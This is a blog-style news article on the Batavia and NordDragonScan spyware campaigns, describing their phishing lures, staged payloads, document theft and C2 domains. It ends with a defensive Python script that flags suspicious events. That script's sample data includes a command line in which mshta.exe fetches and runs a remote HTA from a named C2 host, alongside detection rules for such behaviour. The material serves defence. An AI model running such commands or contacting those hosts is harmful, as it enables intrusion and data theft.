A New Spyware Called Batavia is Stealing Docs from Russian Companies — and Hardly Anyone Noticed


So, here is something that kind of flew under the radar, but definitely should not have: security researchers just found this new spyware called Batavia targeting Russian companies. It is not some recycled malware with a fancy name slapped on it. It is a completely new spyware, and it has been doing its thing since mid-2024 without drawing much attention — until now.
Kaspersky is the one that published the details. They say the whole thing starts out pretty standard, as far as phishing attacks go. Victims get an email that looks like it is about signing a contract — which, if you work in finance or legal, is just another Tuesday. The email includes a link, but instead of a regular attachment, it leads to a zip or archive file. Inside that, there is a .VBE file — a Visual Basic Encoded script. If you are wondering, yeah, people still fall for those. A surprising number of them.
Once you run the script, that is when Batavia starts doing its thing. It checks out your system specs first — basically profiling the host — and then phones home to a remote server. After that, it grabs the next payload, which is a Delphi-based executable. That might sound weird because not many modern malware strains use Delphi anymore, but hey, it still works, and maybe that is the point. Makes detection a little less predictable.
Oh, and get this — while the fake contract pops up on screen like nothing shady is going on, Batavia is quietly rummaging through your files in the background. Office docs, PDFs, spreadsheets — the usual suspects. It even grabs screenshots and checks any USB drives that are plugged in. It is not flashy, just efficient.
But it does not stop there.
Once that part is done, another stage kicks in. The malware pulls down another binary, which broadens the scope. Now it is looking for emails, pictures, slide decks, zipped archives, CSVs, you name it. Basically, anything remotely valuable or sensitive. That part of the data gets shipped off to a second domain — ru-exchange[.]com. After that, there is apparently one more executable that gets downloaded. Nobody knows exactly what that last one does yet, but let’s be real — it is probably not good.
And while this whole thing sounds like a complex multi-stage nightmare (because it kind of is), it has been quietly hitting dozens of Russian orgs. According to Kaspersky’s telemetry, more than 100 users across various companies received these phishing emails over the past year. That is a decent footprint for something that had not been identified until now.
Also, for what it is worth, Batavia does not just steal documents. It also dumps details like which programs you have installed, drivers, OS components — stuff that could be useful for profiling the target or maybe prepping for a more targeted attack later.
Now, while everyone is still wrapping their heads around Batavia, another campaign has popped up too — this one involving malware called NordDragonScan. This was detailed by Fortinet’s FortiGuard Labs, and it is not really related to Batavia, but they both follow a similar kind of stealthy, staged infection model.
So here is how NordDragonScan works: it usually arrives via a phishing email (because of course it does), which drops a RAR file. Inside the archive? A Windows shortcut — a .LNK file — that abuses mshta.exe to run a remote HTML Application (HTA). If that sounds old-school, it is, but it still works. When the HTA runs, it opens a decoy document in Ukrainian (totally harmless-looking), while a .NET-based payload gets silently dropped in the background.
What does NordDragonScan do once it is in? Pretty similar playbook. It scans the machine, takes screenshots, scrapes browser data (Chrome and Firefox profiles are prime targets), and pulls docs and PDFs. The fun part? It even sets up persistence by messing with the Windows Registry, so the malware can survive reboots. Everything it grabs gets sent back to a C2 server at kpuszkiev[.]com through a plain HTTP POST request.
So yeah, nothing earth-shatteringly new in terms of technique, but these attacks are getting cleaner, quieter, and honestly more patient. They do not try to blow the door off the hinges. They sneak in, look around, grab what they need, and leave the lights on so you do not notice.
You might be wondering — why should anyone outside of Russia care about Batavia or NordDragonScan? Well, the tactics are what matter. These multi-stage, stealth-heavy infection chains are becoming more common because they work. And if you are working in cybersecurity, or even just handling sensitive data at your company, this kind of stuff should be on your radar — especially if your defenses still mostly rely on detecting single-stage, obvious malware.
To be honest, a lot of companies are still super vulnerable to basic phishing that drops a .VBE or .LNK file. These are not even sophisticated attachments. They just exploit the fact that people are too busy or too trusting to double-check a file that looks like it is coming from HR or Legal.
So if nothing else, take this as a reminder to lock down email filtering, monitor traffic for weird C2 behavior, and maybe disable mshta.exe if you are not using it. Also — and this sounds obvious but people forget — train your users. A decent phishing simulation goes a long way.
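To make "monitor for weird C2 behavior" concrete, here is an added example (my own code, not from the article, Kaspersky or Fortinet) that runs a small triage pass over constructed, Sysmon-style event records and flags the three patterns described above: a script host running a .VBE out of a user-writable folder, mshta.exe pulling a remote HTA, and an HTTP POST to either of the two domains the article names. The event layout and the sample paths are assumptions for the demo.

```python
"""Toy detection pass over constructed process/network events (not real telemetry)."""
import re

# Constructed sample events, loosely modelled on Sysmon process-create and
# network-connection records. Paths and file names are made up for the demo.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\ann\AppData\Local\Temp\Rar$DIa1\contract_2024.vbe"',
     "parent": r"C:\Program Files\WinRAR\WinRAR.exe"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://kpuszkiev.com/update.hta",
     "parent": r"C:\Windows\explorer.exe"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'notepad.exe "C:\Users\ann\Documents\notes.txt"',
     "parent": r"C:\Windows\explorer.exe"},
    {"type": "network", "image": r"C:\Users\ann\AppData\Roaming\svc.exe",
     "method": "POST", "host": "ru-exchange.com"},
    {"type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "method": "GET", "host": "example.org"},
]

# The two C2 domains quoted (de-fanged) in the article.
C2_DOMAINS = {"ru-exchange.com", "kpuszkiev.com"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Folders a phished user can write to and where an extracted .VBE typically lands.
USER_WRITABLE = re.compile(r"\\(Temp|Downloads|AppData)\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return a finding label for one event, or None if it looks benign."""
    if ev["type"] == "process":
        img, cmd = basename(ev["image"]), ev["cmdline"].lower()
        if img in SCRIPT_HOSTS and ".vbe" in cmd and USER_WRITABLE.search(ev["cmdline"]):
            return "encoded-vbscript-from-user-dir"
        if img == "mshta.exe" and re.search(r"https?://", cmd):
            return "mshta-remote-hta"
    elif ev["type"] == "network":
        if ev["method"] == "POST" and ev["host"].lower() in C2_DOMAINS:
            return "post-to-known-c2"
    return None


def scan(events):
    """Return (image, label) pairs for every event that trips a rule."""
    return [(e["image"], label) for e in events if (label := classify(e))]


if __name__ == "__main__":
    for image, label in scan(EVENTS):
        print(f"{label:32} {image}")
```

Real deployments would key these rules on parent/child process chains and signed-binary checks rather than file extensions alone, but the point is that each stage of these chains leaves a separate, cheap-to-spot artifact.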